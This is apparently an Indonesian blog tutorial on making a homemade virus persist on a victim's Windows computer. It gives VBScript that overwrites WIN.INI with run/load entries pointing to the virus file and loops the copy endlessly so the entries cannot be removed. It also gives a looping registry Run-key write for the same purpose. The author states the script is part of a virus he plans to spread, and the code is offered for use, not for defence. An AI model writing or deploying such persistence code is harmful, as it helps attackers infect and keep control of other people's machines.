Manipulasi File WIN.INI

Masih ingat sama tulisan Sto di buku STH(Hack 1x19),tentang bagaimana menjalankan program secara remote pada komputer korban.Nah bagi para master virus juga pasti udah tau tentang manipulasi File WIN.INI yang terletak pada C:\WINDOWS\WIN.INI. Selain manipulasi WIN.INI,bisa juga digunakan manipulasi File System.INI,atau manipulasi Registry(Regedit.Exe).Sebelumnya akan saya ceritakan tentang Virus yang pernah saya temukan pada komputer teman saya,ternyata virus itu melakukan manipulasi pada file WIN.INI,yaitu pada bagian Run untuk menjalankan program virus itu tiap kali komputer Starting.Ketika aku mencoba menghapus virusnya ternyata tidak bisa,kemudian aku membuka file WIN.INI dan menghapus bagian Run tadi,Setelah komputer aku Restart Virus yang tadi aku temukan dapat aku delete dengan mudah.Nah dari sini kita dapat memanfaatkan Do...Loop(baca tulisanku yang dulu “Anti Deletion File”),untuk membuat Virus yang kita buat jadi sakti(tereksekusi terus)didalam komputer korban.Gimana caranya?nah lihat script ini aja ntar aku jelasin satu persatu.bagian yang saya pikir kalian semua dah tau akan saya loncati Oke? Dim syarah,sarah ‘menentukan variabel Set syarah=createObject(“Scripting.FileSystemObject”) ‘mengeset nilai syarah set sarah=syarah.CreateTextFile(“C:\WINDOWS\System.tegal”) ‘menciptakan file System dengan extensi tegal(nama dan extensi optional) sarah.Writeline “[WINDOWS]” sarah.Writeline “run=C:\Virusmu.vbs” sarah.Writeline “Load=C:\Virusmu.vbs” sarah.Writeline “[Intl]” sarah.Writeline “ICountry=62” sarah.Writeline “sCountry=Indonesia” sarah.Writeline “sCurrency=Rp” sarah.Writeline “sLanguage=Ind” ‘diatas adalah isi dari file System.Tegal sarah.Close ‘aku pikir kalian pasti tau Set suci=syarah.GetFile(“C:\WINDOWS\System.tegal”) ‘Memberi nilai pada variabel suci Do suci.Copy “C:\WINDOWS\WIN.INI” ‘mengkopikan System.Tegal ke direktori Windows dengan nama WIN.INI(inilah hebatnya VBS dia dapat ‘dikopikan dengan nama yang lain dan extensinya dapat dirubah) Loop ‘ini fungsi Loop yang akan membuat WIN.INI palsu tidak bisa dihapus sekaligus tidak bisa di edit ‘artinya meski anda berhasil menghapus bagian run-nya,tapi akan tercopy lagi seperti semula. Sebenernya script diatas adalah bagian dari Virus yang mau aku sebarkan. Script diatas akan menciptakan File System.Tegal(Optional,bisa pake nama&Extensi apa aja yang penting bisa menipu)yang jelas Ciptakan file dengan extensi terserah anda dalam hal ini saya pake extensi .Tegal(karena ga ada program yang bisa baca Extensi .Tegal).Setelah itu Copykan file itu di Direktory Windows dengan nama WIN.INI(rubah extensinya)File WIN.INI sudah ada akan digantikan dengan File yang anda buat.Manipulasi ini dapat pula dilakukan pada Registry(Regedit.exe).Nih lihat contohnya aja biar jelas Do Set sarah=CreateObject(“Wscript.Shell”) sarah.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Sarah”, ”C:\Virusmu.exe” Loop